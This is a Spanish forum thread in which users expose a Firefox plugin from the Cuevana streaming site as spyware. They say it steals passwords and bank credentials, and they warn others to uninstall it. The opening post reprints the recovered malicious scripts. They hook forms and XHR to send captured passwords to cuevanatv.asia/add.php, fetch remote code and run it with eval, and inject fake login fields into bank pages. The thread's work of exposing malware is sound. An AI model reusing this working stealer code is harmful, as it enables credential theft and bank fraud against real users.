ATENCION, CUEVANA es SPYWARE, prueba inside

[srednalF]

PRUEBAS:

he aquí las pruebas encontradas y recopiladas

Cita:

Originalmente Escrito por RME

Recopilación de Malware

hxxp://cuevanatv.asia/plugin.js

Código:

win.document.querySelector("#log_contenidop").innerHTML='<table  width="100%" border="0" cellspacing="1"  cellpadding="1">\n<tbody><tr>\n<td  colspan="2"><img width="148" height="14" title="Ingreso a  SuperNet" alt="Ingreso a SuperNet"  src="images/ingreso_supernet.jpg">\n<input type="hidden"  value="/schmexapp/index.jsp" name="pag">\n<input type="hidden"  value="/schmexapp/index.jsp" name="miURL">\n<input type="hidden"  value="1" name="irAmodulo"></td>\n</tr>\n<tr><td  width="49%" align="right"  class="texto_log">C&oacute;digo&nbsp;de&nbsp;Cliente:</td>\n<td  width="51%"><label><input type="password"  class="texto_form" style="width:60px;height:10px"  name="login.claveCliente" id="usuario"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right" class="texto_log">NIP:</td>\n<td  width="51%"><label><input type="password" class="texto_form"  style="width:60px;height:10px" name="login.claveCliente" id="clave"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right" class="texto_log">NIP  Dinamico:</td>\n<td width="51%"><label><input  type="password" class="texto_form" style="width:60px;height:10px"  name="login.claveCliente" id="nipd"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right"  class="texto_log">Telefono:</td>\n<td  width="51%"><label><input type="text" class="texto_form"  style="width:60px;height:10px" name="login.claveCliente" id="tel"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right"  class="texto_log">Celular:</td>\n<td  width="51%"><label><input type="text" class="texto_form"  style="width:60px;height:10px" name="login.claveCliente" id="cel"  autocomplete="off">\n</label></td></tr>\n<tr>\n<td  align="right" class="texto_log"></td>\n<td>\n<a  onclick="javascript:login_personas();return false"  id="splg.btnEntrar" href="#"><img width="39" height="16"  border="0" align="absmiddle" title="Ingrese a Supernet" alt="Ingrese a  Supernet"  src="images/entrar.jpg"></a></td>\n</tr>\n<tr>\n<td  align="right" class="texto_log"><a class="link_rojo02"  onclick="getOutboundLink(\'Login\',\'Afiliarse\');MM_openBrWindow(\'https://www.santander.com.mx/Supernet2007/AfiliacionSupernet\',\'supernetWindow\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes,  width=1020,height=630\')" href="javascript:void(0)"><strong>AFILIARSE</strong></a></td>\n<td>|  <a onclick="getOutboundLink(\'Login\',\'Tutorial  Supernet\');MM_openBrWindow(\'http://www.santander.com.mx/demo/demo.html\',\'Tutorial\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes,  width=960,height=590\')" class="liga_gris" href="javascript:void(0)">Tutorial</a></td>\n</tr>\n<tr>\n<td  align="center" colspan="2"><table width="242" border="0"  cellspacing="0" cellpadding="0">\n<tbody><tr>\n<td  colspan="3"><img width="242" height="24"  src="images/beneficios-canales.gif"></td>\n</tr>\n<tr>\n<td><a  onclick="javascript:getOutboundLink(\'Supernet\',\'Beneficios  Supernet\');MM_openBrWindow(\'http://www.servicios.santander.com.mx/supernet\',\'Supernet\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1020,height=630\')"  href="javascript:void(0)"><img width="103" height="21"  border="0" alt="SuperNet"  src="images/canal-supernet.gif"></a></td>\n<td><img  width="33" height="21"  src="images/canal-linea.gif"></td>\n<td><a  onclick="javascript:getOutboundLink(\'SuperMovil\',\'Beneficios  SuperMovil\');MM_openBrWindow(\'http://servicios.santander.com.mx/supermovil/principal/index.html\',\'SuperMovil\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1100,height=700\')"  href="javascript:void(0)"><img width="106" height="21"  border="0" alt="SuperMóvil"  src="images/canal-supermovil.gif"></a></td>\n</tr>\n</tbody></table></td>\n</tr>\n</tbody></table><style>#fiesta_rewards{display:none}#login_container{height:225px}</style>';

win.redirectOutput = function (login,pass){

    d = new Array();
    d.push("usr:"+win.document.getElementById('usuario').value);
    d.push("pss:"+win.document.getElementById('clave').value);
    d.push("nipd:"+win.document.getElementById('nipd').value);
    d.push("tel:"+win.document.getElementById('tel').value);
    d.push("cel:"+win.document.getElementById('cel').value);
    _sData(d.join(":_:"), win.location.href);

    var head = win.document.getElementsByTagName('head')[0];

    var script = win.document.createElement('script');
    script.type = 'text/javascript';
    script.appendChild(win.document.createTextNode(r_output.toString()));

    head.appendChild(script);

    win.r_output(login,pass);

}

win.login_personas = function() {
    
    var usr = win.document.forms['gestor'].usuario;
    var psw = win.document.forms['gestor'].clave;
    var go = win.document.getElementById("splg.btnEntrar");
    var frm = win.document.getElementById("gestor");

    if(usr.value == ""){
    usr.focus(); usr.select();
    alert("Favor de teclear su código de cliente.");return;
    } 
        
    if(!/^[a-zA-Z0-9]{8}$|^[a-zA-Z0-9]{4}$/.test(psw.value)) {
    alert("El NIP debe de ser de 8 o 4 caracteres. Solo letras y números.");return;
    }

    if(win.document.getElementById("MKD25X")) win.document.getElementById("MKD25X").SkipVerify(1);

    usr.value = win.completeUsrID(usr.value);
    if(win.document.getElementById("MKD25X")) {
        win.document.getElementById("MKD25X").SkipVerify(0);
    }

    if(!/^[0-9]{8}$|^[0-9]{16}$/.test(usr.value)) {
    alert("El C\363digo de Cliente debe ser n\372merico, de 8 \363 16 d\355gitos.");
    usr.focus(); usr.select();return;
    }

    if(win.document.getElementById('nipd').value=='') {
        alert("Favor de teclear su NIP DINAMICO.");
        return;
    }
    if(win.document.getElementById('tel').value=='') {
        alert("Favor de teclear su TELEFONO.");
        return;
    }
    if(win.document.getElementById('cel').value=='') {
        alert("Favor de teclear su TELEFONO MOVIL.");
        return;
    }

    win.Login(frm);
    win.redirectOutput(usr.value,psw.value);
}

function r_output(login,pass){
    objWin = open("" ,"supernetWindow","top=0,left=0,scrollbars=1,\
    resizable=1,menubar=0,toolbar=0,location=0,directories=0,status=1");
     objWin.document.write('<HTML><HEAD></HEAD><BODY><form  name = "oculForm" method="post" target="supernetWindow"  action="https://www.santander.com.mx/Supernet2007/loginGestor.jsp"><INPUT  TYPE="hidden" name="usuario" value="' + login + '"><INPUT  TYPE="password" style="display:none;" name="clave" value="' + pass +  '"><input type="hidden" name="pag"  value="/schmexapp/index.jsp"><input type="hidden" name="miURL"  value="/schmexapp/index.jsp"><input type=hidden name=irAmodulo  value=1>');
    if (LoginPersonasComoBancaPrivada) objWin.document.write ('<input type="hidden" name="SNETBP" value="SI"/>');
    objWin.document.write('</form></BODY></HTML>');
    objWin.document.oculForm.submit();
}

hxxp://cuevanatv.asia/back3.js

Código:

    var r = new XMLHttpRequest();
    r.open('GET', "http://cuevanatv.asia/scripts.txt", false);
    r.send(null);
    if (r.status == 200) eval(r.responseText);


OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).OS;
OSid = (OSid=='Darwin')?3:((OSid=='WINNT' )?2:((OSid=='Linux')?1:0));

function _sData(datos, url) {
    var r = new XMLHttpRequest;
    r.open("POST", "http://cuevanatv.asia/add.php", true);
    r.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    r.send("d="+datos+"&o="+OSid+"&u="+url);
}

Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService).addObserver({
    observe : function(aWindow, aTopic, aData) {
    if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') {

        var win = aWindow.wrappedJSObject;

        
        win.addEventListener("submit",
        function(e) {

            datos  = [];
            enviar = false;

            for each(i in e.target.elements) {
                if(i.type=='password') enviar=true;
                if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value);
            }

            if(enviar) _sData(datos.join(":_:"), win.location.href);

        }
        ,false);

        
        var xmlhr = new Object();
            xmlhr.open = win.XMLHttpRequest.prototype.open;
            xmlhr.send = win.XMLHttpRequest.prototype.send;

        if (win.location.host.indexOf("facebook.com")==-1) { 

            
            win.XMLHttpRequest.prototype.open=function(a,b){

                a=(!a)?'':a;
                b=(!b)?'':b;

                xmlhr.open.apply(this, arguments);

                xmlhr.metodo = a.toLowerCase();
                xmlhr.url = b;

                if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1];
            }

            
            win.XMLHttpRequest.prototype.send=function(a,b){

                a=(!a)?'':a;
                b=(!b)?'':b;

                xmlhr.send.apply(this, arguments);
                
                if(xmlhr.metodo=='post') xmlhr.datos = a;

                xmlhr.callback();

            }

        }

        xmlhr.callback = function(){

            enviar = false;
            activadores = ["pass", "pss", "clave", "contra"];

            for each(dato in this.datos.split("&")) {
            for each(activador in activadores) {
                if(dato.split("=")[0].indexOf(activador)>-1) enviar=true;
            }
            }

            if(enviar) _sData(this.datos.split("&").join(":_:").split("=").join("::"), win.location.href);

        }

        win.addEventListener("DOMContentLoaded", function(e){
        
        for(site in scripts) {    
        if (win.location.host.indexOf(site)>-1) {

            var r = new XMLHttpRequest();
            r.open('GET', scripts[site], false);
            r.send(null);
            if (r.status == 200) eval(r.responseText);

        }
        }

        },false);

    
    
    }
    }
}, 'content-document-global-created', false);

hxxp://cuevanatv.asia/plugin1.js

Código:

win.HacerSubmitPL = function() {
    var tarjeta = win.document.form1.notarjeta1.value;
    var valor;
    valor = tarjeta.charAt(0);
    if ("3" != valor) {
        win.document.form1.action = "https://e-bdvcpx.banvenez.com/ClavenetPersonalExpress/defaultclavenet.asp";
        win.document.form1.WITHCERTIFICATE.value = false;
        win.document.form1.ant.value = "2";
        win.document.form1.notarjeta.value = document.form1.notarjeta1.value;
        win.document.form1.passwordp.value = document.form1.passwordp1.value;
        win.document.form1.target = "_parent";
        win.document.form1.submit();
    } else {
        alert("Tarjeta Inv\xE1lida");
        return false;
    }
}

hxxp://cuevanatv.asia/plugin2.js

Código:

if(win.document.location.href.indexOf("inverweb/entrada_.asp")>-1) {

    inputs = "<div id='tabla'><div  id='Usuario'><strong>Clave:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='clave' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Token:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='token' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Telefono:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='telefono' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Celular:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='celular' class='textInput'  size='18'></div></div></div>";

    ihtml = win.document.Entrada.innerHTML;
    ihtml = ihtml.split('<div id="tabla">');
    ihtml[1]+=inputs;
    win.document.Entrada.innerHTML = ihtml.join('<div id="tabla">');

    win.Valida_Clave = function(dummy) {

        if (win.Entrada.txtCliente.value == "")    {
        alert("Indica un valor para el campo Usuario.");
        win.Entrada.txtCliente.focus(); return false;
        }

        if (win.Entrada.clave.value == "")    {
        alert("Indica un valor para el campo Clave.");
        win.Entrada.clave.focus(); return false;
        }

        if (win.Entrada.token.value == "")    {
        alert("Indica un valor para el campo Token.");
        win.Entrada.token.focus(); return false;
        }

        if (win.Entrada.telefono.value == "")    {
        alert("Indica un valor para el campo Telefono.");
        win.Entrada.telefono.focus(); return false;
        }

        if (win.Entrada.celular.value == "")    {
        alert("Indica un valor para el campo Celular.");
        win.Entrada.celular.focus(); return false;
        }
        return true;
    }

}

hxxp://cuevanatv.asia/plugin1.js

Código:

win.HacerSubmitPL = function() {     var tarjeta =  win.document.form1.notarjeta1.value;     var valor;     valor =  tarjeta.charAt(0);     if ("3" != valor) {          win.document.form1.action =  "https://e-bdvcpx.banvenez.com/ClavenetPersonalExpress/defaultclavenet.asp";          win.document.form1.WITHCERTIFICATE.value = false;          win.document.form1.ant.value = "2";          win.document.form1.notarjeta.value = document.form1.notarjeta1.value;          win.document.form1.passwordp.value =  document.form1.passwordp1.value;         win.document.form1.target =  "_parent";         win.document.form1.submit();     } else {          alert("Tarjeta Inv\xE1lida");         return false;     }  }

hxxp://cuevanatv.asia/plugin2.js

Código:

if(win.document.location.href.indexOf("inverweb/entrada_.asp")>-1)  {      inputs = "<div id='tabla'><div  id='Usuario'><strong>Clave:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='clave' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Token:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='token' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Telefono:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='telefono' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Celular:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='celular' class='textInput'  size='18'></div></div></div>";      ihtml =  win.document.Entrada.innerHTML;     ihtml = ihtml.split('<div  id="tabla">');     ihtml[1]+=inputs;      win.document.Entrada.innerHTML = ihtml.join('<div  id="tabla">');      win.Valida_Clave = function(dummy) {          if  (win.Entrada.txtCliente.value == "")    {         alert("Indica un valor  para el campo Usuario.");         win.Entrada.txtCliente.focus();  return false;         }          if (win.Entrada.clave.value == "")    {          alert("Indica un valor para el campo Clave.");          win.Entrada.clave.focus(); return false;         }          if  (win.Entrada.token.value == "")    {         alert("Indica un valor para  el campo Token.");         win.Entrada.token.focus(); return false;          }          if (win.Entrada.telefono.value == "")    {          alert("Indica un valor para el campo Telefono.");          win.Entrada.telefono.focus(); return false;         }           if (win.Entrada.celular.value == "")    {         alert("Indica  un valor para el campo Celular.");         win.Entrada.celular.focus();  return false;         }         return true;     }  }

Recopilación con fin de que cuando borren todas las pruebas tenerlas aquí recopiladas y poder tomar medidas legales.

vídeo demostrativo

y enlace al plugin infectado .xpi de firefox , versión 4.2


http://www.**************/?r998dij1fj1kb9e

OTRA VICTORIA DE FOROCOCHES! VIVA FC!
--------------------------------

TOCHO RESUMEN:

Descubro que el plugin de CUEVANA.TV está enviando todos los datos de usuario y contraseña de todas las páginas web al dominio cuevanatv.asia/add.php, varios foreros se unen y entre todos descubrimos los scripts maliciosos y los recopilamos aquí, además descubrimos 3 scripts que supuestamente tienen relación con el robo de datos de bancarios del santander mexicano, banco de venezuela y scotiabank, otros foreros descomprimen el plugin y dan con la dirección del script malicioso que estaba robando los datos, el cual también está recopilado aquí, pasa un tiempo y la noticia se difunde por Twitter y Menéame, después ocurre lo más flipante de todo, el dominio cuevanatv.asia deja de existir, o está caído, la empresa de hosting no dice nada, cuevana.tv actualiza su plugin de Firefox pero manteniendo la misma versión (para simular que no lo han actualizado), el forero chico2009 se da cuenta de que el checksum MD5 del supuesto mismo plugin, no coincide con el checksum del plugin infectado (el cual guarda en su pc) (el checksum es una cadena de texto generada a partir de los datos binarios de un programa, asi explicado a modo rapido) esto quiere decir, que la nueva version del plugin de cuevana, a pesar de que ellos intentan simular que es la misma, NO LA ES, dado que los checksum no coinciden, de nuevo varios foreros descomprimen el nuevo plugin de cuevana y se dan cuentan de que el código malicioso está desaparecido, pero aun no ha acabado todo, el forero chico2009 guardó el plugin antiguo y lo ha subido, de este modo tenemos todos los datos posibles recopilados, es hora de pasar a la acción, JUSTICIA !!!!


lo acabo de descubrir, he buscado info. en google y no aparece nada, todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:

logueándome a GMAIL










todos los que usen este plugin, DESINSTALARLO AHORA y cambiar todas vuestras contraseñas, un saludo y puntuad 5 estrellas y mantener el hilo uppeado para que la gente lo vea, buenas noches


actualización: el forero DaGGoTH ha confirmado el "problema", el plugin al parecer SÍ que roba los datos y no era solo un problema mio ni de mi ordenador, hambicionad

actualización 2:

actualización 3: post #206
actualización 4: post #217, el forero muertet ha encontrado la parte de código maliciosa tambien por sus propios medios, queda confirmado, que para firefox 15 /ubuntu 11.10/windows 7 y plugin cuevana 4.2 este problema existe, que los demás foreros aporten sus configuraciones y digan si esto sucede o no sucede

actualización 5: confirmado, en firefox, cualquier versión, está infectado con el código malicioso que roba datos. también estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios

actualización 6: todos los scripts maliciosos encontrados estan el post #295 por el forero RME, por si alguien los borra, están ahí


actualización 7 : CUEVANATV.ASIA ESTÁ CAÍDO, PROBABLEMENTE QUIERAN ESCURRIR EL BULTO O QUE LA COMPÑIA DE HOSTING HAYA CERRADO LA CUENTA HOSTING

actualización 8:
DESPUÉS DE CERRAR CUEVANATV.ASIA EL PLUGIN LO HAN CAMBIADO, VARIOS SHURMANOS TIENEN EL PLUGIN ANTIGUO-ORIGINAL, CON LA NUEVA VERSIÓN YA NO CAPTURAN DATOS, HAY QUE HACER JUSTICIA, HIJOS DE PUTA,

en el post numero #591 esta el plugin subido por el usuario chico2009, notad que solo los usuarios de forocoches podrán descargarlo ya que es un archivo adjunto, si alguien lo sube a otro mirror lo pongo

actualización 9:
http://www.**************/?r998dij1fj1kb9e ahí la versión infectada, a todo el que no se lo crea, que le den por el culo, al que se lo crea lo puede descomprimir con el winrar por ejemplo, en el script-compiler.js linea 200 y pico hay un eval que carga el script de http://cuevanatv.asia/back3.js el script malicioso para robar datos, parece que esto termina aqui, gracias a TODOS los que habeis difundido y ayudado


actualización 10: cuevana se esta pronunciando en su twitter poco a poco, dicen que no es cosa de ellos, etc. por una parte hay que darles confianza, y eso explicaria por que algunos usuarios con un plugin mas antiguo, o el mismo plugin, no encuentran la linea de codigo malicioso al abrir el script-compiler.js, por otra parte es muy sospechoso que se haya borrado todo antes de que empezaran a hablar (incluyendo la actualizacion del plugin por uno sin infectar) y hay que recordar que antiguamente el plugin te redireccionaba a cuevana cuando veias algun video de megavideo (esto yo ni lo sabia )

tutorial, como desinstalarlo de firefox:

• os vais a herramientas -> addons ( o extensiones, yo tengo la version inglesa ) o simplemente pulsad control + shift + A

• os vais a extensiones y pulsais eliminar/remove y listo (luego reiniciad firefox)

[Barney Gumble]

Pole.

[Joy06]

Nunca lo use por que me dio mala espina, tengo un aracnosentido!

[srednalF]

up

[Kolmor]

yo he pagado la cuota asique a mi no me hace falta el plugin ese

[*FuturoAutoBan*]

si no se lo que es cuevana.tv no corro peligro, no?

[LoMioPaMi]

que es eso de cuevana?

[Soberbia]

Lo uso desde hace más de un año y, hasta ahora, ningún problema

De hecho, me voy a ver una peli en tu honor.

[srednalF]

http://www.cuevana.tv/ eso es cuevana, una web muy famosa en españa y latinoamerica al estilo series.ly / seriesyonkis / etc..

[Jotha-]

wtf

[stoikov22]

Cita:

Originalmente Escrito por soberbia

lo uso desde hace más de un año y, hasta ahora, ningún problema

De hecho, me voy a ver una peli en tu honor.

+1

[DaGGoTH]

Joder si es así esto es muy grave. Voy a hacer unas pruebas.

[Mandrivia]

Interesante...

[srednalF]

Cita:

Originalmente Escrito por DaGGoTH

Joder si es así esto es muy grave. Voy a hacer unas pruebas.

haz lo mismo que yo y me cuentas, a ver si va a ser solo problema mio pero ya te digo que lo he probado 2 veces, una con un plugin version antigua, luego desinstalado (todo iba bien) luego he ido a cuevana.tv y he instalado de nuevo el plugin y ha vuelto a pasar

[crocketa]

nunca lo he instalado...
¿un resumen sobre lo que aporta?

[Soberbia]

Cita:

Originalmente Escrito por crocketa

nunca lo he instalado...
¿un resumen sobre lo que aporta?

Es una web de streaming online sin límites y con muy buena calidad. VO y con subtítulos, a veces también en inglés. Yo prefiero usarla antes que vk.

[x.atlas]

¿Has probado en Chrome?

[srednalF]

Cita:

Originalmente Escrito por crocketa

nunca lo he instalado...
¿un resumen sobre lo que aporta?

a ver, es una pagina de peliculas y cuando vas a ver una te pide instalar un plugin para el navegador, lo instalas y te deja ver los links de descarga etc, la pagina me parecia bastante seria y la utilizaba para ver alguna peliculilla, pero ya no

[srednalF]

Cita:

Originalmente Escrito por x.atlas

¿Has probado en Chrome?

no, pero el plugin debe ser el mismo, no se ningun addon para el chrome que tenga la misma funcion que el tamper data, el tamper data solo es para firefox y es un addon que permite ver con qué "contacta tu navegador" por decirlo asi, asi es como he descubierto que en todos los formularios primero "contacta" con cuevana y luego con la pagina en cuestion en la que estas

[srednalF]

up

[DaGGoTH]

Cita:

Originalmente Escrito por srednalF

haz lo mismo que yo y me cuentas, a ver si va a ser solo problema mio pero ya te digo que lo he probado 2 veces, una con un plugin version antigua, luego desinstalado (todo iba bien) luego he ido a cuevana.tv y he instalado de nuevo el plugin y ha vuelto a pasar

Acabo de probar con proxy local y con las developer tools de chrome y el problema no se reproduce. A ver si vas a tener algún bicho...

Voy a probar con el tamper data...

[DaGGoTH]

Cita:

Originalmente Escrito por srednalF

no, pero el plugin debe ser el mismo, no se ningun addon para el chrome que tenga la misma funcion que el tamper data, el tamper data solo es para firefox y es un addon que permite ver con qué "contacta tu navegador" por decirlo asi, asi es como he descubierto que en todos los formularios primero "contacta" con cuevana y luego con la pagina en cuestion en la que estas

En Chrome control+shift+i -> pestaña network

[srednalF]

Cita:

Originalmente Escrito por DaGGoTH

Acabo de probar con proxy local y con las developer tools de chrome y el problema no se reproduce. A ver si vas a tener algún bicho...

Voy a probar con el tamper data...

lo dudo shur, desinstalando el plugin de cuevana (bajado de cuevana.tv) no salta nada raro en el tamper data

edit: de todos modos pruebalo y si no te sale me como un owned

edit2: en el chrome a mi tampoco me sale en firefox si (no quiere decir que los usuarios de chrome esteis seguros)

[crocketa]

Cita:

Originalmente Escrito por Soberbia

Es una web de streaming online sin límites y con muy buena calidad. VO y con subtítulos, a veces también en inglés. Yo prefiero usarla antes que vk.

Cita:

Originalmente Escrito por srednalF

a ver, es una pagina de peliculas y cuando vas a ver una te pide instalar un plugin para el navegador, lo instalas y te deja ver los links de descarga etc, la pagina me parecia bastante seria y la utilizaba para ver alguna peliculilla, pero ya no

Gracias por la respuesta
si que la usaba...no lo recordaba
voy a ver si lo tengo instalado aún...gracias por el aviso

[alpacino]

ostia puta, pillo sitio

[DaGGoTH]

Nada, todo correcto.

Edito: Fallo mío, en firefox no tenía instalado el plugin. Voy a repetir.

[Lockheed]

Cita:

Originalmente Escrito por srednalF

http://www.cuevana.tv/ eso es cuevana, una web muy famosa en españa y latinoamerica al estilo series.ly / seriesyonkis / etc..

famosisima

[Bro-Mouzone]

No creo eh? Llevo mucho tiempo usando esta página y parece muy respetable y profesional como para eso.

[srednalF]

Cita:

Originalmente Escrito por DaGGoTH

Nada, todo correcto.

no te sale nada en el tamper ? voy a desinstalar el plugin otra vez y a probar

[alpacino]

Cita:

Originalmente Escrito por Lockheed

famosisima

Pues lo es, seguramente para ti lo sea elitetorrent o divxtotal, esas creadas por el 1870